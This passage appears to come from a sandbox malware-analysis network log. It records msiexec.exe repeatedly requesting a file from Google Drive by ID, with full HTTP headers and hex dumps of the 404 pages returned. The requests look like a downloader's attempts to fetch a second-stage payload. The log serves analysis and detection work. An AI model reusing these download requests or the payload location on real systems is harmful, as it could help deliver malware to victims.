2025-01-10 14:45:13 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSmoUgooKuoCmpwHl9xZzJuBp1UwZQddB8FOUyupwXmI-xTGmkCRckAkM3x4_xPzRpk Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:13 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-g6wcti4bQ6XoIAO1LKVqlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:13 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 4b 62 50 41 78 48 6f 6a 5f 4b 31 75 52 73 47 4b 79 77 2d 39 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JKbPAxHoj_K1uRsGKyw-9g">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	57064	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:14 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:14 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:14 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-3eLUHYhUThBCsBCTLwKNnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	57065	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:15 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:15 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSXr6AFJfF9KbYr1M_yXQBRhDhIzOuy9qZ4mDToqHipmfIiB2SGTk9lUelM0JBo4xJ18DhLAM0 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:15 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Lw2RzfHWkk8OjXESxbIjpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:15 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 37 57 55 62 6d 4d 74 73 2d 71 46 67 62 62 70 73 4c 77 4f 30 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="b7WUbmMts-qFgbbpsLwO0g">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	57066	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:16 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:16 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:16 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-iiaCjJ_FJ54RtUsF3f8CRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	57067	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:17 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:17 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTVnld8NBC9qZ6EF2Wd45AEtYXlyLBGP4Um8doA2PSmJuQytL6gL8ADExV6QuSf1k5Q Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:17 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-WsNNETnZk-9HHybQCYMajA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:17 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 45 43 43 63 2d 31 73 64 2d 6f 70 65 58 4e 6e 6f 45 7a 48 42 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rECCc-1sd-opeXNnoEzHBA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	57068	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:18 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:19 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:19 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-g7qhnBkxjqx86R5radls5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	57069	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:19 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:20 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgS0NwoZjxbND-O7t_mpQojFmjEEXZ2mrg0nTIqzMXIm7LqdPvHu7xTW3NaS2ygdw5tM Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:20 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-rTwP-3V4K3rLALPE6X4RIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:20 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 47 34 4b 53 68 45 2d 38 74 32 45 6c 41 32 37 35 32 58 5f 64 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aG4KShE-8t2ElA2752X_dA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	57070	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:21 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:21 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:21 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-bQl3i-7X9IRMxHU4DGp2Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	57071	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:22 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
